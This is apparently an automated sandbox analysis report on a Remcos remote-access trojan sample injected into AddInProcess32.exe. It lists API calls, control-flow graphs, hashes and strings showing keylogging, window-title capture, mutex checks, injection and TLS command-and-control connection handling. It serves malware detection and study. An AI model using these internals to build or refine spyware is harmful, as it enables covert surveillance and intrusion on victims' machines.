                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                    • String ID: Keylogger initialization failure: error
                                                                                                    • API String ID: 3219506041-952744263
                                                                                                    • Opcode ID: fdc0b474fe1aff0b22fd9a46203375ee37c9d39229ef2232f764eb0bd3d466e4
                                                                                                    • Instruction ID: 7386389ed158dc1e9b291cee6df9fe5cdc6a320468782ebba6dd7d831fd8f91b
                                                                                                    • Opcode Fuzzy Hash: fdc0b474fe1aff0b22fd9a46203375ee37c9d39229ef2232f764eb0bd3d466e4
                                                                                                    • Instruction Fuzzy Hash: 4D119431604301ABC7107B769D0985BB7ECEB99712B500A7EFC95D32D2EB74C900CB6A

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 00411F34: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00411F54
                                                                                                      • Part of subcall function 00411F34: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,00472200), ref: 00411F72
                                                                                                      • Part of subcall function 00411F34: RegCloseKey.KERNELBASE(?), ref: 00411F7D
                                                                                                    • Sleep.KERNELBASE(00000BB8), ref: 0040E243
                                                                                                    • ExitProcess.KERNEL32 ref: 0040E2B4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                    • String ID: 3.8.0 Pro$override$pth_unenc$!G
                                                                                                    • API String ID: 2281282204-1386060931
                                                                                                    • Opcode ID: a288d8616e236b4235b05259e5913bb087acfdbfedd53e6c5eb68c0c5d578e2c
                                                                                                    • Instruction ID: b884fba6e00cc138548ee74cf6c0f0a6577cc223cd772b3e63c92b5116f64211
                                                                                                    • Opcode Fuzzy Hash: a288d8616e236b4235b05259e5913bb087acfdbfedd53e6c5eb68c0c5d578e2c
                                                                                                    • Instruction Fuzzy Hash: 6E213770B4030027DA08B6768D5BAAE35899B82708F40446FF911AB2D7EEBD8D4583DF
                                                                                                    APIs
                                                                                                    • GetLocalTime.KERNEL32(?), ref: 00404F61
                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FAD
                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_00005130,?,00000000,00000000), ref: 00404FC0
                                                                                                    Strings
                                                                                                    • Connection KeepAlive | Enabled | Timeout: , xrefs: 00404F74
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Create$EventLocalThreadTime
                                                                                                    • String ID: Connection KeepAlive | Enabled | Timeout:
                                                                                                    • API String ID: 2532271599-507513762
                                                                                                    • Opcode ID: 5d766c76dcec6d73f72b384432e0c1d874659834d306d7d3d0de572776f31551
                                                                                                    • Instruction ID: 3880ceca910d84d0b9b3d3001f949c19a9d90d4f91ad2e0c59d2668d569340f7
                                                                                                    • Opcode Fuzzy Hash: 5d766c76dcec6d73f72b384432e0c1d874659834d306d7d3d0de572776f31551
                                                                                                    • Instruction Fuzzy Hash: 4F1127719002806AC720BB769C0DE9B7FA89BD2714F44056FF44123281D6B89445CBBA
                                                                                                    APIs
                                                                                                    • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00431274,00000034,?,?,012E1450), ref: 004315FE
                                                                                                    • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000), ref: 00431614
                                                                                                    • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000,0041C006), ref: 00431626
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 1815803762-0
                                                                                                    • Opcode ID: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
                                                                                                    • Instruction ID: e2f248fbd61bea3c509e9dcbc4a9d000159a3c4e1760f154dd59208f6820a057
                                                                                                    • Opcode Fuzzy Hash: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
                                                                                                    • Instruction Fuzzy Hash: FDE0923130C310BBEB304F51AC09F172A55EB8DB72FA5063AF112E50F4D6518801855C
                                                                                                    APIs
                                                                                                    • GetComputerNameExW.KERNELBASE(00000001,?,00000037,00471FFC), ref: 00419615
                                                                                                    • GetUserNameW.ADVAPI32(?,00000010), ref: 0041962D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Name$ComputerUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 4229901323-0
                                                                                                    • Opcode ID: df11981a8253a9f6cfa01e36e72ce3640b108b9b137393204108e0effccf0179
                                                                                                    • Instruction ID: 5ca8c18713c22ae7facf93a828c8627c995cdb1c7496207664ac88b3b4335c79
                                                                                                    • Opcode Fuzzy Hash: df11981a8253a9f6cfa01e36e72ce3640b108b9b137393204108e0effccf0179
                                                                                                    • Instruction Fuzzy Hash: 7C01FF7290011CABCB04EBD5DC45EDEB7BCEF44319F10016AB505B61A5EEB46A89CB98
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: recv
                                                                                                    • String ID:
                                                                                                    • API String ID: 1507349165-0
                                                                                                    • Opcode ID: 3ba0adabb739ddff39a3f19a3894bbfe9ce5bc94458df24d68493e41c2bfa472
                                                                                                    • Instruction ID: 0df3b2746f7319e4a339c8fc0296cb6b5099ceb5184c402daa9575d879af207d
                                                                                                    • Opcode Fuzzy Hash: 3ba0adabb739ddff39a3f19a3894bbfe9ce5bc94458df24d68493e41c2bfa472
                                                                                                    • Instruction Fuzzy Hash: 81B09B75105201BFC6150750CD0486E7DA597C8381B40491CB14641171C535C4505715

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 7 40d3f0-40d45f call 41a8da call 40dd83 call 4020d6 * 2 call 419d87 call 40e563 call 401e6d call 43a300 24 40d461-40d4b5 call 40e609 call 401e45 call 401f8b call 40f98d call 40e5ba call 40dd70 call 401fb8 7->24 25 40d4b8-40d57f call 401e45 call 401f8b call 401e45 call 4052fe call 408209 call 401fc2 call 401fb8 * 2 call 401e45 call 401fa0 call 405a86 call 401e45 call 4051c3 call 401e45 call 4051c3 7->25 70 40d581-40d5c9 call 40822a call 401fc2 call 401fb8 call 401f8b call 411f34 25->70 71 40d5cf-40d5ea call 401e45 call 40fbab 25->71 70->71 105 40dd0f-40dd27 call 401f8b call 41239a call 410eda 70->105 80 40d656-40d679 call 401f8b CreateMutexA GetLastError 71->80 81 40d5ec-40d60d call 401e45 call 401f8b OpenMutexA 71->81 91 40d991-40d99a call 401fb8 80->91 92 40d67f-40d686 80->92 101 40d622-40d63f call 401f8b call 411f34 81->101 102 40d60f-40d61c WaitForSingleObject CloseHandle 81->102 109 40d9a1-40da01 call 434c30 call 40245c call 401f8b * 2 call 4120e8 call 408093 91->109 96 40d688 92->96 97 40d68a-40d6a7 GetModuleFileNameW call 4192ae 92->97 96->97 107 40d6b0-40d6b4 97->107 108 40d6a9-40d6ab 97->108 122 40d651 101->122 123 40d641-40d650 call 401f8b call 41239a 101->123 102->101 137 40dd2c 105->137 113 40d6b6-40d6c9 call 401e45 call 401f8b 107->113 114 40d717-40d72a call 401e45 call 401f8b 107->114 108->107 175 40da06-40da5f call 401e45 call 401f8b call 402073 call 401f8b call 41215f call 401e45 call 401f8b call 439867 109->175 113->114 142 40d6cb-40d6d1 113->142 138 40d731-40d7ad call 401e45 call 401f8b call 408093 call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b 114->138 139 40d72c call 40e501 114->139 122->80 123->122 143 40dd31-40dd65 call 402073 call 4052dd call 402073 call 4194da call 401fb8 137->143 217 40d815-40d819 138->217 218 40d7af-40d7c8 call 401e45 call 401f8b call 439891 138->218 139->138 142->114 148 40d6d3-40d6d9 142->148 188 40dd6a-40dd6f call 413980 143->188 153 40d6f7-40d710 call 401f8b call 411eea 148->153 154 40d6db-40d6ee call 4060ea 148->154 153->114 179 40d712 call 4066a6 153->179 154->114 166 40d6f0-40d6f5 call 4067a0 154->166 166->114 220 40da61-40da63 175->220 221 40da65-40da67 175->221 179->114 217->109 219 40d81f-40d826 217->219 218->217 247 40d7ca-40d810 call 401e45 call 401f8b call 401e45 call 401f8b call 40c5ed call 401ef3 call 401ee9 218->247 223 40d8a7-40d8b1 call 408093 219->223 224 40d828-40d8a5 call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 40b871 219->224 225 40da6b-40da7c call 41aa4f CreateThread 220->225 226 40da69 221->226 227 40da7e-40db48 call 402073 * 2 call 4194da call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 439867 call 401e45 call 401f8b call 401e45 call 401f8b call 408f1f call 401e45 call 401f8b 221->227 236 40d8b6-40d8de call 40245c call 43254d 223->236 224->236 225->227 226->225 349 40db83-40db9a call 401e45 call 401f8b 227->349 350 40db4a-40db81 call 43229f call 401e45 call 401f8b CreateThread 227->350 255 40d8f0 236->255 256 40d8e0-40d8ee call 434c30 236->256 247->217 262 40d8f2-40d93d call 401ee4 call 43a796 call 40245c call 401f8b call 40245c call 401f8b call 412338 255->262 256->262 316 40d942-40d967 call 432556 call 401e45 call 40fbab 262->316 316->175 332 40d96d-40d98c call 401e45 call 419bca call 40de34 316->332 332->175 345 40d98e-40d990 332->345 345->91 360 40dbd9-40dbeb call 401e45 call 401f8b 349->360 361 40db9c-40dbd4 call 43229f call 401e45 call 401f8b CreateThread 349->361 350->349 372 40dc4c-40dc5e call 401e45 call 401f8b 360->372 373 40dbed-40dc47 call 401e45 call 401f8b call 401e45 call 401f8b call 40c5a1 call 401ef3 call 401ee9 CreateThread 360->373 361->360 383 40dc60-40dc94 call 401e45 call 401f8b call 401e45 call 401f8b call 439867 call 40b0a3 372->383 384 40dc99-40dcbf call 4195f8 call 401ef3 call 401ee9 372->384 373->372 383->384 406 40dcc1-40dcc2 SetProcessDEPPolicy 384->406 407 40dcc4-40dcd7 CreateThread 384->407 406->407 408 40dce5-40dcec 407->408 409 40dcd9-40dce3 CreateThread 407->409 412 40dcfa-40dd01 408->412 413 40dcee-40dcf8 CreateThread 408->413 409->408 412->137 416 40dd03-40dd06 412->416 413->412 416->188 418 40dd08-40dd0d 416->418 418->143
                                                                                                    APIs
                                                                                                      • Part of subcall function 0041A8DA: LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
                                                                                                      • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
                                                                                                      • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
                                                                                                      • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A912
                                                                                                      • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
                                                                                                      • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A927
                                                                                                      • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
                                                                                                      • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A940
                                                                                                      • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
                                                                                                      • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A954
                                                                                                      • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
                                                                                                      • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A96C
                                                                                                      • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
                                                                                                      • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A980
                                                                                                      • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
                                                                                                      • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A98F
                                                                                                      • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
                                                                                                      • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
                                                                                                      • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
                                                                                                      • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
                                                                                                      • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
                                                                                                      • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
                                                                                                      • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
                                                                                                      • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
                                                                                                      • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
                                                                                                      • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
                                                                                                      • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
                                                                                                      • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 0040D603
                                                                                                      • Part of subcall function 0040F98D: __EH_prolog.LIBCMT ref: 0040F992
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModule$LibraryLoad$H_prologMutexOpen
                                                                                                    • String ID: (#G$0"G$0"G$0"G$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$Exe$H"G$H"G$Inj$Remcos Agent initialized$Software\$User$`"G$exepath$licence$license_code.txt$origmsc$!G$!G$!G$!G$!G
                                                                                                    • API String ID: 1529173511-2670159127
                                                                                                    • Opcode ID: c5c97665cbcc9d5c27e630072efbb3309ee1890ec75580c2947f5294856dfb00
                                                                                                    • Instruction ID: a36e185f3bd9362bdba41541190492353975b392bf08c7d21c2bc217d0697d36
                                                                                                    • Opcode Fuzzy Hash: c5c97665cbcc9d5c27e630072efbb3309ee1890ec75580c2947f5294856dfb00
                                                                                                    • Instruction Fuzzy Hash: 5622B960B043412BDA1577B69C67A7E25998F81708F04483FF946BB2E3EEBC4D05839E

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 420 413980-4139c8 call 4020bf call 419894 call 4020bf call 401e45 call 401f8b call 439867 433 4139d7-413a23 call 402073 call 401e45 call 4020d6 call 419d87 call 40487e call 401e45 call 40fbab 420->433 434 4139ca-4139d1 Sleep 420->434 449 413a25-413a94 call 401e45 call 40245c call 401e45 call 401f8b call 401e45 call 40245c call 401e45 call 401f8b call 401e45 call 40245c call 401e45 call 401f8b call 40471d 433->449 450 413a97-413b32 call 402073 call 401e45 call 4020d6 call 419d87 call 401e45 * 2 call 40822a call 402ef0 call 401fc2 call 401fb8 * 2 call 401e45 call 405ae5 433->450 434->433 449->450 503 413b42-413b49 450->503 504 413b34-413b40 450->504 505 413b4e-413be0 call 405a86 call 4052fe call 408209 call 402ef0 call 402073 call 4194da call 401fb8 * 2 call 401e45 call 401f8b call 401e45 call 401f8b call 41393f 503->505 504->505 532 413be2-413c26 WSAGetLastError call 41a86b call 4052dd call 402073 call 4194da call 401fb8 505->532 533 413c2b-413c39 call 40480d 505->533 555 414493-4144a5 call 404e06 call 4021da 532->555 538 413c66-413c74 call 404f31 call 4048a8 533->538 539 413c3b-413c61 call 402073 * 2 call 4194da 533->539 551 413c79-413c7b 538->551 539->555 554 413c81-413dd4 call 401e45 * 2 call 4052fe call 408209 call 402ef0 call 408209 call 402ef0 call 402073 call 4194da call 401fb8 * 4 call 4197c1 call 413013 call 408098 call 43f34f call 401e45 call 4020d6 call 40245c call 401f8b * 2 call 4120e8 551->554 551->555 620 413dd6-413de3 call 405a86 554->620 621 413de8-413e0f call 401f8b call 411f91 554->621 569 4144a7-4144c7 call 401e45 call 401f8b call 439867 Sleep 555->569 570 4144cd-4144d5 call 401e6d 555->570 569->570 570->450 620->621 627 413e11-413e13 621->627 628 413e16-414406 call 40415e call 419c8a call 419b16 call 401e45 GetTickCount call 419b16 call 419ac6 call 419b16 call 419a77 call 419c8a * 5 call 40e2bb call 419c8a call 402f11 call 402e81 call 402ef0 call 402e81 call 402ef0 * 3 call 402e81 call 402ef0 call 408209 call 402ef0 call 408209 call 402ef0 call 402e81 call 402ef0 call 402e81 call 402ef0 call 402e81 call 402ef0 call 402e81 call 402ef0 call 40826c call 402ef0 call 402e81 call 402ef0 call 402e81 call 402ef0 call 408209 call 402ef0 * 5 call 402e81 call 402ef0 call 402e81 call 402ef0 * 6 call 404a81 call 401fb8 * 48 call 401ee9 call 401fb8 * 4 call 401ee9 call 404bf0 621->628 627->628 856 414408-41440f 628->856 857 41441a-414421 628->857 856->857 858 414411-414413 856->858 859 414423-414428 call 409f9a 857->859 860 41442d-41445f call 405a4b call 402073 * 2 call 4194da 857->860 858->857 859->860 871 414461-41446d CreateThread 860->871 872 414473-41448e call 401fb8 * 2 call 401ee9 860->872 871->872 872->555
                                                                                                    APIs
                                                                                                    • Sleep.KERNEL32(00000000,00000029,75920F10,00471FFC,00000000), ref: 004139D1
                                                                                                    • WSAGetLastError.WS2_32(00000000,00000001), ref: 00413BE2
                                                                                                    • Sleep.KERNELBASE(00000000,00000002), ref: 004144C7
                                                                                                      • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Sleep$ErrorLastLocalTime
                                                                                                    • String ID: | $%I64u$3.8.0 Pro$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$H"G$TLS Off$TLS On $`"G$hlight$name$!G
                                                                                                    • API String ID: 524882891-3814560791
                                                                                                    • Opcode ID: d601f5427b71b8bebfdd2cdf66b2cc0c2884c600b77c3aa14ce07a42c2b727ff
                                                                                                    • Instruction ID: 5f58eceae2704c6c0e376aa481a0c6a7ef3cc820e2c63ea8d389b44db61c6c97
                                                                                                    • Opcode Fuzzy Hash: d601f5427b71b8bebfdd2cdf66b2cc0c2884c600b77c3aa14ce07a42c2b727ff
                                                                                                    • Instruction Fuzzy Hash: 9F42AE31A001055BCB18F765DDA6AEEB3699F90308F1041BFF40A721E2EF785F868A5D

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • connect.WS2_32(?,?,?), ref: 004048C0
                                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049E0
                                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049EE
                                                                                                    • WSAGetLastError.WS2_32 ref: 00404A01
                                                                                                      • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                    • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                    • API String ID: 994465650-2151626615
                                                                                                    • Opcode ID: c47823f5d81b8fcd8c44ffe76240809f8c8049aa42c9dfd8a5859606e97f7b5b
                                                                                                    • Instruction ID: f1749a2af40dec866484330b2464a30bcc7489b9f615ba144f2b3c776ade1d80
                                                                                                    • Opcode Fuzzy Hash: c47823f5d81b8fcd8c44ffe76240809f8c8049aa42c9dfd8a5859606e97f7b5b
                                                                                                    • Instruction Fuzzy Hash: 37412AB5B406017BD608777A8E1B96E7625AB81304B50017FF901136D2EBBD9C2197DF

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E18
                                                                                                    • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E23
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E2C
                                                                                                    • closesocket.WS2_32(000000FF), ref: 00404E3A
                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E71
                                                                                                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404E82
                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E89
                                                                                                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E9A
                                                                                                    • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E9F
                                                                                                    • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EA4
                                                                                                    • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404EB1
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404EB6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                    • String ID:
                                                                                                    • API String ID: 3658366068-0
                                                                                                    • Opcode ID: f707382b18fa39c0527187131c55234197c0fa46854763e90b09e39a9568e99a
                                                                                                    • Instruction ID: b890c501aeabc943cf782ca315c2c368517b908ebe77e8074f52597b82095e9a
                                                                                                    • Opcode Fuzzy Hash: f707382b18fa39c0527187131c55234197c0fa46854763e90b09e39a9568e99a
                                                                                                    • Instruction Fuzzy Hash: 1B212C71000B009FDB216B26DC49B17BBE5FF40326F114A2DE2E212AF1CB79E851DB58

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • __Init_thread_footer.LIBCMT ref: 00409C81
                                                                                                    • Sleep.KERNELBASE(000001F4), ref: 00409C8C
                                                                                                    • GetForegroundWindow.USER32 ref: 00409C92
                                                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 00409C9B
                                                                                                    • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 00409CCF
                                                                                                    • Sleep.KERNEL32(000003E8), ref: 00409D9D
                                                                                                      • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,?,0040A77B,?,?,?,?,?,00000000), ref: 0040965A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                    • String ID: [${ User has been idle for $ minutes }$]
                                                                                                    • API String ID: 911427763-3954389425
                                                                                                    • Opcode ID: ee9b949ba4685117d773663a634f46785a27bf3fcb47f19481d588488b50e058
                                                                                                    • Instruction ID: 7a62ae1493acfbf190be1d0992f15f5c774c3bdccfea44e4f2dca48363f02a21
                                                                                                    • Opcode Fuzzy Hash: ee9b949ba4685117d773663a634f46785a27bf3fcb47f19481d588488b50e058
                                                                                                    • Instruction Fuzzy Hash: 7C5193716043405BD304FB61D855A6EB795AF84308F50093FF486A62E3DF7CAE45C69A

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1051 40c5ed-40c612 call 401f66 1054 40c618 1051->1054 1055 40c73c-40c762 call 401ee4 GetLongPathNameW call 40415e 1051->1055 1056 40c711-40c716 1054->1056 1057 40c654-40c659 1054->1057 1058 40c727 1054->1058 1059 40c718-40c725 call 439e5f 1054->1059 1060 40c629-40c637 call 41959f call 401ef3 1054->1060 1061 40c64a-40c64f 1054->1061 1062 40c70a-40c70f 1054->1062 1063 40c65e-40c665 call 419f23 1054->1063 1064 40c61f-40c624 1054->1064 1076 40c767-40c7d4 call 40415e call 40c7f9 call 402f85 * 2 call 401ee9 * 5 1055->1076 1066 40c72c call 439e5f 1056->1066 1057->1066 1058->1066 1059->1058 1079 40c732-40c737 call 408093 1059->1079 1085 40c63c 1060->1085 1061->1066 1062->1066 1077 40c667-40c6b7 call 40415e call 439e5f call 40415e call 402f85 call 401ef3 call 401ee9 * 2 1063->1077 1078 40c6b9-40c705 call 40415e call 439e5f call 40415e call 402f85 call 401ef3 call 401ee9 * 2 1063->1078 1064->1066 1080 40c731 1066->1080 1090 40c640-40c645 call 401ee9 1077->1090 1078->1085 1079->1055 1080->1079 1085->1090 1090->1055
                                                                                                    APIs
                                                                                                    • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040C753
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: LongNamePath
                                                                                                    • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                    • API String ID: 82841172-425784914
                                                                                                    • Opcode ID: 4909517bb95d2f61249d5f86287d70e817a98b5eecf58a630361d829804c392b
                                                                                                    • Instruction ID: e0747f7f0ded3e76473395fd4b63a7f1dfd4675be44f898a7a0c8db3d1efc66a
